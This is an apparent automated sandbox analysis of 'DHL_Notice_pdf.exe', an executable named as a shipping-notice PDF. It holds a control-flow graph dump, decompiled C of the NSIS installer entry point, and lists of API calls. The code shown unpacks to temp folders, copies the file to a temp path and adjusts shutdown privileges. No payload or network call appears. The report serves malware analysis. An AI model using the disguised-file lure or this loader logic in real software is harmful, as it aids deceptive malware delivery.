4628->4629 4629->4623 4636 4045c4 18 API calls 4630->4636 4634 40462b 8 API calls 4631->4634 4632->4633 4640 405461 4633->4640 4641 40545a ImageList_Destroy 4633->4641 4648 405471 4633->4648 4639 405637 4634->4639 4653 40518f 4636->4653 4637->4631 4643 4053f8 SendMessageW 4637->4643 4638 40537c SendMessageW 4638->4625 4644 40546a GlobalFree 4640->4644 4640->4648 4641->4640 4642 4055eb 4642->4631 4649 4055fd ShowWindow GetDlgItem ShowWindow 4642->4649 4646 40540b 4643->4646 4644->4648 4645 40526a GetWindowLongW SetWindowLongW 4647 405283 4645->4647 4657 40541c SendMessageW 4646->4657 4650 4052a0 4647->4650 4651 405288 ShowWindow 4647->4651 4648->4642 4665 4054ac 4648->4665 4677 404fff 4648->4677 4649->4631 4671 4045f9 SendMessageW 4650->4671 4670 4045f9 SendMessageW 4651->4670 4652->4625 4652->4638 4653->4645 4656 4051e2 SendMessageW 4653->4656 4658 405265 4653->4658 4659 405220 SendMessageW 4653->4659 4660 405234 SendMessageW 4653->4660 4656->4653 4657->4627 4658->4645 4658->4647 4659->4653 4660->4653 4662 4055b6 4663 4055c1 InvalidateRect 4662->4663 4666 4055cd 4662->4666 4663->4666 4664 4054da SendMessageW 4668 4054f0 4664->4668 4665->4664 4665->4668 4666->4642 4686 404f3a 4666->4686 4667 405564 SendMessageW SendMessageW 4667->4668 4668->4662 4668->4667 4670->4631 4671->4620 4673 404fa2 GetMessagePos ScreenToClient SendMessageW 4672->4673 4674 404fde SendMessageW 4672->4674 4675 404fd6 4673->4675 4676 404fdb 4673->4676 4674->4675 4675->4652 4676->4674 4689 406668 lstrcpynW 4677->4689 4679 405012 4690 4065af wsprintfW 4679->4690 4681 40501c 4682 40140b 2 API calls 4681->4682 4683 405025 4682->4683 4691 406668 lstrcpynW 4683->4691 4685 40502c 4685->4665 4692 404e71 4686->4692 4688 404f4f 4688->4642 4689->4679 4690->4681 4691->4685 4693 404e8a 4692->4693 4694 4066a5 17 API calls 4693->4694 4695 404eee 4694->4695 4696 4066a5 17 API calls 4695->4696 4697 404ef9 4696->4697 4698 4066a5 17 API calls 4697->4698 4699 404f0f lstrlenW wsprintfW SetDlgItemTextW 4698->4699 
4699->4688 4705 4023b2 4706 4023ba 4705->4706 4709 4023c0 4705->4709 4707 402da6 17 API calls 4706->4707 4707->4709 4708 4023ce 4711 4023dc 4708->4711 4712 402da6 17 API calls 4708->4712 4709->4708 4710 402da6 17 API calls 4709->4710 4710->4708 4713 402da6 17 API calls 4711->4713 4712->4711 4714 4023e5 WritePrivateProfileStringW 4713->4714 4715 404734 lstrlenW 4716 404753 4715->4716 4717 404755 WideCharToMultiByte 4715->4717 4716->4717 4718 402434 4719 402467 4718->4719 4720 40243c 4718->4720 4722 402da6 17 API calls 4719->4722 4721 402de6 17 API calls 4720->4721 4723 402443 4721->4723 4724 40246e 4722->4724 4726 402da6 17 API calls 4723->4726 4728 40247b 4723->4728 4729 402e64 4724->4729 4727 402454 RegDeleteValueW RegCloseKey 4726->4727 4727->4728 4730 402e78 4729->4730 4732 402e71 4729->4732 4730->4732 4733 402ea9 4730->4733 4732->4728 4734 4064d5 RegOpenKeyExW 4733->4734 4735 402ed7 4734->4735 4736 402ee7 RegEnumValueW 4735->4736 4743 402f81 4735->4743 4745 402f0a 4735->4745 4737 402f71 RegCloseKey 4736->4737 4736->4745 4737->4743 4738 402f46 RegEnumKeyW 4739 402f4f RegCloseKey 4738->4739 4738->4745 4740 406a35 5 API calls 4739->4740 4741 402f5f 4740->4741 4741->4743 4744 402f63 RegDeleteKeyW 4741->4744 4742 402ea9 6 API calls 4742->4745 4743->4732 4744->4743 4745->4737 4745->4738 4745->4739 4745->4742 4746 401735 4747 402da6 17 API calls 4746->4747 4748 40173c SearchPathW 4747->4748 4749 401757 4748->4749 4750 404ab5 4751 404ae1 4750->4751 4752 404af2 4750->4752 4811 405cac GetDlgItemTextW 4751->4811 4754 404afe GetDlgItem 4752->4754 4759 404b5d 4752->4759 4757 404b12 4754->4757 4755 404c41 4760 404df0 4755->4760 4813 405cac GetDlgItemTextW 4755->4813 4756 404aec 4758 4068ef 5 API calls 4756->4758 4762 404b26 SetWindowTextW 4757->4762 4763 405fe2 4 API calls 4757->4763 4758->4752 4759->4755 4759->4760 4764 4066a5 17 API calls 4759->4764 4767 40462b 8 API calls 4760->4767 4766 4045c4 18 API calls 4762->4766 4768 404b1c 4763->4768 4769 404bd1 SHBrowseForFolderW 
4764->4769 4765 404c71 4770 40603f 18 API calls 4765->4770 4771 404b42 4766->4771 4772 404e04 4767->4772 4768->4762 4776 405f37 3 API calls 4768->4776 4769->4755 4773 404be9 CoTaskMemFree 4769->4773 4774 404c77 4770->4774 4775 4045c4 18 API calls 4771->4775 4777 405f37 3 API calls 4773->4777 4814 406668 lstrcpynW 4774->4814 4778 404b50 4775->4778 4776->4762 4779 404bf6 4777->4779 4812 4045f9 SendMessageW 4778->4812 4782 404c2d SetDlgItemTextW 4779->4782 4787 4066a5 17 API calls 4779->4787 4782->4755 4783 404b56 4785 406a35 5 API calls 4783->4785 4784 404c8e 4786 406a35 5 API calls 4784->4786 4785->4759 4793 404c95 4786->4793 4788 404c15 lstrcmpiW 4787->4788 4788->4782 4791 404c26 lstrcatW 4788->4791 4789 404cd6 4815 406668 lstrcpynW 4789->4815 4791->4782 4792 404cdd 4794 405fe2 4 API calls 4792->4794 4793->4789 4797 405f83 2 API calls 4793->4797 4799 404d2e 4793->4799 4795 404ce3 GetDiskFreeSpaceW 4794->4795 4798 404d07 MulDiv 4795->4798 4795->4799 4797->4793 4798->4799 4801 404f3a 20 API calls 4799->4801 4809 404d9f 4799->4809 4800 404dc2 4816 4045e6 EnableWindow 4800->4816 4803 404d8c 4801->4803 4802 40140b 2 API calls 4802->4800 4805 404da1 SetDlgItemTextW 4803->4805 4806 404d91 4803->4806 4805->4809 4807 404e71 20 API calls 4806->4807 4807->4809 4808 404dde 4808->4760 4810 404a0e SendMessageW 4808->4810 4809->4800 4809->4802 4810->4760 4811->4756 4812->4783 4813->4765 4814->4784 4815->4792 4816->4808 4817 401d38 4818 402d84 17 API calls 4817->4818 4819 401d3f 4818->4819 4820 402d84 17 API calls 4819->4820 4821 401d4b GetDlgItem 4820->4821 4822 402638 4821->4822 4823 4014b8 4824 4014be 4823->4824 4825 401389 2 API calls 4824->4825 4826 4014c6 4825->4826 4827 40563e 4828 405662 4827->4828 4829 40564e 4827->4829 4832 40566a IsWindowVisible 4828->4832 4838 405681 4828->4838 4830 405654 4829->4830 4831 4056ab 4829->4831 4834 404610 SendMessageW 4830->4834 4833 4056b0 CallWindowProcW 4831->4833 4832->4831 4835 405677 4832->4835 4836 40565e 4833->4836 4834->4836 4837 
404f7f 5 API calls 4835->4837 4837->4838 4838->4833 4839 404fff 4 API calls 4838->4839 4839->4831 4840 40263e 4841 402652 4840->4841 4842 40266d 4840->4842 4843 402d84 17 API calls 4841->4843 4844 402672 4842->4844 4845 40269d 4842->4845 4854 402659 4843->4854 4847 402da6 17 API calls 4844->4847 4846 402da6 17 API calls 4845->4846 4849 4026a4 lstrlenW 4846->4849 4848 402679 4847->4848 4857 40668a WideCharToMultiByte 4848->4857 4849->4854 4851 40268d lstrlenA 4851->4854 4852 4026e7 4853 4026d1 4853->4852 4855 40620a WriteFile 4853->4855 4854->4852 4854->4853 4856 406239 5 API calls 4854->4856 4855->4852 4856->4853 4857->4851

                                                            Control-flow Graph

                                                            C-Code - Quality: 78%
                                                            			_entry_() {
                                                            				WCHAR* _v8;
                                                            				signed int _v12;
                                                            				void* _v16;
                                                            				signed int _v20;
                                                            				int _v24;
                                                            				int _v28;
                                                            				struct _TOKEN_PRIVILEGES _v40;
                                                            				signed char _v42;
                                                            				int _v44;
                                                            				signed int _v48;
                                                            				intOrPtr _v278;
                                                            				signed short _v310;
                                                            				struct _OSVERSIONINFOW _v324;
                                                            				struct _SHFILEINFOW _v1016;
                                                            				intOrPtr* _t88;
                                                            				WCHAR* _t92;
                                                            				char* _t94;
                                                            				void _t97;
                                                            				void* _t116;
                                                            				WCHAR* _t118;
                                                            				signed int _t119;
                                                            				intOrPtr* _t123;
                                                            				void* _t137;
                                                            				void* _t143;
                                                            				void* _t148;
                                                            				void* _t152;
                                                            				void* _t157;
                                                            				signed int _t167;
                                                            				void* _t170;
                                                            				void* _t175;
                                                            				intOrPtr _t177;
                                                            				intOrPtr _t178;
                                                            				intOrPtr* _t179;
                                                            				int _t188;
                                                            				void* _t189;
                                                            				void* _t198;
                                                            				signed int _t204;
                                                            				signed int _t209;
                                                            				signed int _t214;
                                                            				signed int _t216;
                                                            				int* _t218;
                                                            				signed int _t226;
                                                            				signed int _t229;
                                                            				CHAR* _t231;
                                                            				char* _t232;
                                                            				signed int _t233;
                                                            				WCHAR* _t234;
                                                            				void* _t250;
                                                            
                                                            				_t216 = 0x20;
                                                            				_t188 = 0;
                                                            				_v24 = 0;
                                                            				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
                                                            				_v20 = 0;
                                                            				SetErrorMode(0x8001); // executed
                                                            				_v324.szCSDVersion = 0;
                                                            				_v48 = 0;
                                                            				_v44 = 0;
                                                            				_v324.dwOSVersionInfoSize = 0x11c;
                                                            				if(GetVersionExW( &_v324) == 0) {
                                                            					_v324.dwOSVersionInfoSize = 0x114;
                                                            					GetVersionExW( &_v324);
                                                            					asm("sbb eax, eax");
                                                            					_v42 = 4;
                                                            					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
                                                            				}
                                                            				if(_v324.dwMajorVersion < 0xa) {
                                                            					_v310 = _v310 & 0x00000000;
                                                            				}
                                                            				 *0x42a318 = _v324.dwBuildNumber;
                                                            				 *0x42a31c = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
                                                            				if( *0x42a31e != 0x600) {
                                                            					_t179 = E00406A35(_t188);
                                                            					if(_t179 != _t188) {
                                                            						 *_t179(0xc00);
                                                            					}
                                                            				}
                                                            				_t231 = "UXTHEME";
                                                            				do {
                                                            					E004069C5(_t231); // executed
                                                            					_t231 =  &(_t231[lstrlenA(_t231) + 1]);
                                                            				} while ( *_t231 != 0);
                                                            				E00406A35(0xb);
                                                            				 *0x42a264 = E00406A35(9);
                                                            				_t88 = E00406A35(7);
                                                            				if(_t88 != _t188) {
                                                            					_t88 =  *_t88(0x1e);
                                                            					if(_t88 != 0) {
                                                            						 *0x42a31c =  *0x42a31c | 0x00000080;
                                                            					}
                                                            				}
                                                            				__imp__#17();
                                                            				__imp__OleInitialize(_t188); // executed
                                                            				 *0x42a320 = _t88;
                                                            				SHGetFileInfoW(0x421708, _t188,  &_v1016, 0x2b4, _t188); // executed
                                                            				E00406668(0x429260, L"NSIS Error");
                                                            				_t92 = GetCommandLineW();
                                                            				_t232 = L"\"C:\\Users\\hardz\\Desktop\\DHL_Notice_pdf.exe\"";
                                                            				E00406668(_t232, _t92);
                                                            				_t94 = _t232;
                                                            				_t233 = 0x22;
                                                            				 *0x42a260 = 0x400000;
                                                            				_t250 = L"\"C:\\Users\\hardz\\Desktop\\DHL_Notice_pdf.exe\"" - _t233; // 0x22
                                                            				if(_t250 == 0) {
                                                            					_t216 = _t233;
                                                            					_t94 =  &M00435002;
                                                            				}
                                                            				_t198 = CharNextW(E00405F64(_t94, _t216));
                                                            				_v16 = _t198;
                                                            				while(1) {
                                                            					_t97 =  *_t198;
                                                            					_t251 = _t97 - _t188;
                                                            					if(_t97 == _t188) {
                                                            						break;
                                                            					}
                                                            					_t209 = 0x20;
                                                            					__eflags = _t97 - _t209;
                                                            					if(_t97 != _t209) {
                                                            						L17:
                                                            						__eflags =  *_t198 - _t233;
                                                            						_v12 = _t209;
                                                            						if( *_t198 == _t233) {
                                                            							_v12 = _t233;
                                                            							_t198 = _t198 + 2;
                                                            							__eflags = _t198;
                                                            						}
                                                            						__eflags =  *_t198 - 0x2f;
                                                            						if( *_t198 != 0x2f) {
                                                            							L32:
                                                            							_t198 = E00405F64(_t198, _v12);
                                                            							__eflags =  *_t198 - _t233;
                                                            							if(__eflags == 0) {
                                                            								_t198 = _t198 + 2;
                                                            								__eflags = _t198;
                                                            							}
                                                            							continue;
                                                            						} else {
                                                            							_t198 = _t198 + 2;
                                                            							__eflags =  *_t198 - 0x53;
                                                            							if( *_t198 != 0x53) {
                                                            								L24:
                                                            								asm("cdq");
                                                            								asm("cdq");
                                                            								_t214 = L"NCRC" & 0x0000ffff;
                                                            								asm("cdq");
                                                            								_t226 = ( *0x40a37e & 0x0000ffff) << 0x00000010 |  *0x40a37c & 0x0000ffff | _t214;
                                                            								__eflags =  *_t198 - (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214);
                                                            								if( *_t198 != (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214)) {
                                                            									L29:
                                                            									asm("cdq");
                                                            									asm("cdq");
                                                            									_t209 = L" /D=" & 0x0000ffff;
                                                            									asm("cdq");
                                                            									_t229 = ( *0x40a372 & 0x0000ffff) << 0x00000010 |  *0x40a370 & 0x0000ffff | _t209;
                                                            									__eflags =  *(_t198 - 4) - (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209);
                                                            									if( *(_t198 - 4) != (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209)) {
                                                            										L31:
                                                            										_t233 = 0x22;
                                                            										goto L32;
                                                            									}
                                                            									__eflags =  *_t198 - _t229;
                                                            									if( *_t198 == _t229) {
                                                            										 *(_t198 - 4) = _t188;
                                                            										__eflags = _t198;
                                                            										E00406668(L"C:\\Users\\hardz\\AppData\\Local\\Temp", _t198);
                                                            										L37:
                                                            										_t234 = L"C:\\Users\\hardz\\AppData\\Local\\Temp\\";
                                                            										GetTempPathW(0x400, _t234);
                                                            										_t116 = E0040360F(_t198, _t251);
                                                            										_t252 = _t116;
                                                            										if(_t116 != 0) {
                                                            											L40:
                                                            											DeleteFileW(L"1033"); // executed
                                                            											_t118 = E004030D0(_t254, _v20); // executed
                                                            											_v8 = _t118;
                                                            											if(_t118 != _t188) {
                                                            												L68:
                                                            												ExitProcess(); // executed
                                                            												__imp__OleUninitialize(); // executed
                                                            												if(_v8 == _t188) {
                                                            													if( *0x42a2f4 == _t188) {
                                                            														L77:
                                                            														_t119 =  *0x42a30c;
                                                            														if(_t119 != 0xffffffff) {
                                                            															_v24 = _t119;
                                                            														}
                                                            														ExitProcess(_v24);
                                                            													}
                                                            													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
                                                            														LookupPrivilegeValueW(_t188, L"SeShutdownPrivilege",  &(_v40.Privileges));
                                                            														_v40.PrivilegeCount = 1;
                                                            														_v28 = 2;
                                                            														AdjustTokenPrivileges(_v16, _t188,  &_v40, _t188, _t188, _t188);
                                                            													}
                                                            													_t123 = E00406A35(4);
                                                            													if(_t123 == _t188) {
                                                            														L75:
                                                            														if(ExitWindowsEx(2, 0x80040002) != 0) {
                                                            															goto L77;
                                                            														}
                                                            														goto L76;
                                                            													} else {
                                                            														_push(0x80040002);
                                                            														_push(0x25);
                                                            														_push(_t188);
                                                            														_push(_t188);
                                                            														_push(_t188);
                                                            														if( *_t123() == 0) {
                                                            															L76:
                                                            															E0040140B(9);
                                                            															goto L77;
                                                            														}
                                                            														goto L75;
                                                            													}
                                                            												}
                                                            												E00405CC8(_v8, 0x200010);
                                                            												ExitProcess(2);
                                                            											}
                                                            											if( *0x42a27c == _t188) {
                                                            												L51:
                                                            												 *0x42a30c =  *0x42a30c | 0xffffffff;
                                                            												_v24 = E00403D17(_t264);
                                                            												goto L68;
                                                            											}
                                                            											_t218 = E00405F64(L"\"C:\\Users\\hardz\\Desktop\\DHL_Notice_pdf.exe\"", _t188);
                                                            											if(_t218 < L"\"C:\\Users\\hardz\\Desktop\\DHL_Notice_pdf.exe\"") {
                                                            												L48:
                                                            												_t263 = _t218 - L"\"C:\\Users\\hardz\\Desktop\\DHL_Notice_pdf.exe\"";
                                                            												_v8 = L"Error launching installer";
                                                            												if(_t218 < L"\"C:\\Users\\hardz\\Desktop\\DHL_Notice_pdf.exe\"") {
                                                            													_t189 = E00405C33(__eflags);
                                                            													lstrcatW(_t234, L"~nsu");
                                                            													__eflags = _t189;
                                                            													if(_t189 != 0) {
                                                            														lstrcatW(_t234, "A");
                                                            													}
                                                            													lstrcatW(_t234, L".tmp");
                                                            													_t219 = L"C:\\Users\\hardz\\Desktop";
                                                            													_t137 = lstrcmpiW(_t234, L"C:\\Users\\hardz\\Desktop");
                                                            													__eflags = _t137;
                                                            													if(_t137 == 0) {
                                                            														L67:
                                                            														_t188 = 0;
                                                            														__eflags = 0;
                                                            														goto L68;
                                                            													} else {
                                                            														__eflags = _t189;
                                                            														_push(_t234);
                                                            														if(_t189 == 0) {
                                                            															E00405C16();
                                                            														} else {
                                                            															E00405B99();
                                                            														}
                                                            														SetCurrentDirectoryW(_t234);
                                                            														__eflags = L"C:\\Users\\hardz\\AppData\\Local\\Temp"; // 0x43
                                                            														if(__eflags == 0) {
                                                            															E00406668(L"C:\\Users\\hardz\\AppData\\Local\\Temp", _t219);
                                                            														}
                                                            														E00406668(0x42b000, _v16);
                                                            														_t201 = "A" & 0x0000ffff;
                                                            														_t143 = ( *0x40a316 & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
                                                            														__eflags = _t143;
                                                            														_v12 = 0x1a;
                                                            														 *0x42b800 = _t143;
                                                            														do {
                                                            															E004066A5(0, 0x420f08, _t234, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x120)));
                                                            															DeleteFileW(0x420f08);
                                                            															__eflags = _v8;
                                                            															if(_v8 != 0) {
                                                            																_t148 = CopyFileW(L"C:\\Users\\hardz\\Desktop\\DHL_Notice_pdf.exe", 0x420f08, 1);
                                                            																__eflags = _t148;
                                                            																if(_t148 != 0) {
                                                            																	E00406428(_t201, 0x420f08, 0);
                                                            																	E004066A5(0, 0x420f08, _t234, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x124)));
                                                            																	_t152 = E00405C4B(0x420f08);
                                                            																	__eflags = _t152;
                                                            																	if(_t152 != 0) {
                                                            																		CloseHandle(_t152);
                                                            																		_v8 = 0;
                                                            																	}
                                                            																}
                                                            															}
                                                            															 *0x42b800 =  *0x42b800 + 1;
                                                            															_t61 =  &_v12;
                                                            															 *_t61 = _v12 - 1;
                                                            															__eflags =  *_t61;
                                                            														} while ( *_t61 != 0);
                                                            														E00406428(_t201, _t234, 0);
                                                            														goto L67;
                                                            													}
                                                            												}
                                                            												 *_t218 = _t188;
                                                            												_t221 =  &(_t218[2]);
                                                            												_t157 = E0040603F(_t263,  &(_t218[2]));
                                                            												_t264 = _t157;
                                                            												if(_t157 == 0) {
                                                            													goto L68;
                                                            												}
                                                            												E00406668(L"C:\\Users\\hardz\\AppData\\Local\\Temp", _t221);
                                                            												E00406668(L"C:\\Users\\hardz\\AppData\\Local\\Temp", _t221);
                                                            												_v8 = _t188;
                                                            												goto L51;
                                                            											}
                                                            											asm("cdq");
                                                            											asm("cdq");
                                                            											asm("cdq");
                                                            											_t204 = ( *0x40a33a & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
                                                            											_t167 = ( *0x40a33e & 0x0000ffff) << 0x00000010 |  *0x40a33c & 0x0000ffff | (_t209 << 0x00000020 |  *0x40a33e & 0x0000ffff) << 0x10;
                                                            											while( *_t218 != _t204 || _t218[1] != _t167) {
                                                            												_t218 = _t218;
                                                            												if(_t218 >= L"\"C:\\Users\\hardz\\Desktop\\DHL_Notice_pdf.exe\"") {
                                                            													continue;
                                                            												}
                                                            												break;
                                                            											}
                                                            											_t188 = 0;
                                                            											goto L48;
                                                            										}
                                                            										GetWindowsDirectoryW(_t234, 0x3fb);
                                                            										lstrcatW(_t234, L"\\Temp");
                                                            										_t170 = E0040360F(_t198, _t252);
                                                            										_t253 = _t170;
                                                            										if(_t170 != 0) {
                                                            											goto L40;
                                                            										}
                                                            										GetTempPathW(0x3fc, _t234);
                                                            										lstrcatW(_t234, L"Low");
                                                            										SetEnvironmentVariableW(L"TEMP", _t234);
                                                            										SetEnvironmentVariableW(L"TMP", _t234);
                                                            										_t175 = E0040360F(_t198, _t253);
                                                            										_t254 = _t175;
                                                            										if(_t175 == 0) {
                                                            											goto L68;
                                                            										}
                                                            										goto L40;
                                                            									}
                                                            									goto L31;
                                                            								}
                                                            								__eflags =  *((intOrPtr*)(_t198 + 4)) - _t226;
                                                            								if( *((intOrPtr*)(_t198 + 4)) != _t226) {
                                                            									goto L29;
                                                            								}
                                                            								_t177 =  *((intOrPtr*)(_t198 + 8));
                                                            								__eflags = _t177 - 0x20;
                                                            								if(_t177 == 0x20) {
                                                            									L28:
                                                            									_t36 =  &_v20;
                                                            									 *_t36 = _v20 | 0x00000004;
                                                            									__eflags =  *_t36;
                                                            									goto L29;
                                                            								}
                                                            								__eflags = _t177 - _t188;
                                                            								if(_t177 != _t188) {
                                                            									goto L29;
                                                            								}
                                                            								goto L28;
                                                            							}
                                                            							_t178 =  *((intOrPtr*)(_t198 + 2));
                                                            							__eflags = _t178 - _t209;
                                                            							if(_t178 == _t209) {
                                                            								L23:
                                                            								 *0x42a300 = 1;
                                                            								goto L24;
                                                            							}
                                                            							__eflags = _t178 - _t188;
                                                            							if(_t178 != _t188) {
                                                            								goto L24;
                                                            							}
                                                            							goto L23;
                                                            						}
                                                            					} else {
                                                            						goto L16;
                                                            					}
                                                            					do {
                                                            						L16:
                                                            						_t198 = _t198 + 2;
                                                            						__eflags =  *_t198 - _t209;
                                                            					} while ( *_t198 == _t209);
                                                            					goto L17;
                                                            				}
                                                            				goto L37;
                                                            			}



















































                                                            0x00403a95
                                                            0x00403a97
                                                            0x00403b6a
                                                            0x00403b6a
                                                            0x00403b6a
                                                            0x00000000
                                                            0x00403a9d
                                                            0x00403a9d
                                                            0x00403a9f
                                                            0x00403aa0
                                                            0x00403aa9
                                                            0x00403aa2
                                                            0x00403aa2
                                                            0x00403aa2
                                                            0x00403aaf
                                                            0x00403ab7
                                                            0x00403abe
                                                            0x00403ac6
                                                            0x00403ac6
                                                            0x00403ad3
                                                            0x00403adf
                                                            0x00403ae9
                                                            0x00403ae9
                                                            0x00403aeb
                                                            0x00403af2
                                                            0x00403afc
                                                            0x00403b08
                                                            0x00403b0e
                                                            0x00403b14
                                                            0x00403b17
                                                            0x00403b21
                                                            0x00403b27
                                                            0x00403b29
                                                            0x00403b2d
                                                            0x00403b3e
                                                            0x00403b44
                                                            0x00403b49
                                                            0x00403b4b
                                                            0x00403b4e
                                                            0x00403b54
                                                            0x00403b54
                                                            0x00403b4b
                                                            0x00403b29
                                                            0x00403b57
                                                            0x00403b5e
                                                            0x00403b5e
                                                            0x00403b5e
                                                            0x00403b5e
                                                            0x00403b65
                                                            0x00000000
                                                            0x00403b65
                                                            0x00403a97
                                                            0x00403a1b
                                                            0x00403a1e
                                                            0x00403a22
                                                            0x00403a27
                                                            0x00403a29
                                                            0x00000000
                                                            0x00000000
                                                            0x00403a35
                                                            0x00403a40
                                                            0x00403a45
                                                            0x00000000
                                                            0x00403a45
                                                            0x004039c3
                                                            0x004039db
                                                            0x004039ec
                                                            0x004039ed
                                                            0x004039f1
                                                            0x004039f3
                                                            0x00403a01
                                                            0x00403a08
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00403a08
                                                            0x00403a0a
                                                            0x00000000
                                                            0x00403a0a
                                                            0x0040392d
                                                            0x00403939
                                                            0x0040393e
                                                            0x00403943
                                                            0x00403945
                                                            0x00000000
                                                            0x00000000
                                                            0x0040394d
                                                            0x00403955
                                                            0x00403966
                                                            0x0040396e
                                                            0x00403970
                                                            0x00403975
                                                            0x00403977
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00403977
                                                            0x00000000
                                                            0x004038d4
                                                            0x0040387d
                                                            0x0040387f
                                                            0x00000000
                                                            0x00000000
                                                            0x00403881
                                                            0x00403885
                                                            0x00403889
                                                            0x00403890
                                                            0x00403890
                                                            0x00403890
                                                            0x00403890
                                                            0x00000000
                                                            0x00403890
                                                            0x0040388b
                                                            0x0040388e
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0040388e
                                                            0x00403827
                                                            0x0040382b
                                                            0x0040382e
                                                            0x00403835
                                                            0x00403835
                                                            0x00000000
                                                            0x00403835
                                                            0x00403830
                                                            0x00403833
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00403833
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00403801
                                                            0x00403801
                                                            0x00403802
                                                            0x00403803
                                                            0x00403803
                                                            0x00000000
                                                            0x00403801
                                                            0x00000000

                                                            APIs
                                                            • SetErrorMode.KERNELBASE(00008001), ref: 00403663
                                                            • GetVersionExW.KERNEL32(?), ref: 0040368C
                                                            • GetVersionExW.KERNEL32(0000011C), ref: 004036A3
                                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040373A
                                                            • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403776
                                                            • OleInitialize.OLE32(00000000), ref: 0040377D
                                                            • SHGetFileInfoW.SHELL32(00421708,00000000,?,000002B4,00000000), ref: 0040379B
                                                            • GetCommandLineW.KERNEL32(00429260,NSIS Error), ref: 004037B0
                                                            • CharNextW.USER32(00000000,"C:\Users\user\Desktop\DHL_Notice_pdf.exe",00000020,"C:\Users\user\Desktop\DHL_Notice_pdf.exe",00000000), ref: 004037E9
                                                            • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 0040391C
                                                            • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040392D
                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403939
                                                            • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040394D
                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403955
                                                            • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403966
                                                            • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040396E
                                                            • DeleteFileW.KERNELBASE(1033), ref: 00403982
                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403A69
                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328), ref: 00403A78
                                                              • Part of subcall function 00405C16: CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C
                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403A83
                                                            • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\DHL_Notice_pdf.exe",00000000,?), ref: 00403A8F
                                                            • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403AAF
                                                            • DeleteFileW.KERNEL32(00420F08,00420F08,?,0042B000,?), ref: 00403B0E
                                                            • CopyFileW.KERNEL32(C:\Users\user\Desktop\DHL_Notice_pdf.exe,00420F08,00000001), ref: 00403B21
                                                            • CloseHandle.KERNEL32(00000000,00420F08,00420F08,?,00420F08,00000000), ref: 00403B4E
                                                            • ExitProcess.KERNEL32(?), ref: 00403B6C
                                                            • OleUninitialize.OLE32(?), ref: 00403B71
                                                            • ExitProcess.KERNEL32 ref: 00403B8B
                                                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403B9F
                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00403BA6
                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403BBA
                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403BD9
                                                            • ExitWindowsEx.USER32 ref: 00403BFE
                                                            • ExitProcess.KERNEL32 ref: 00403C1F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
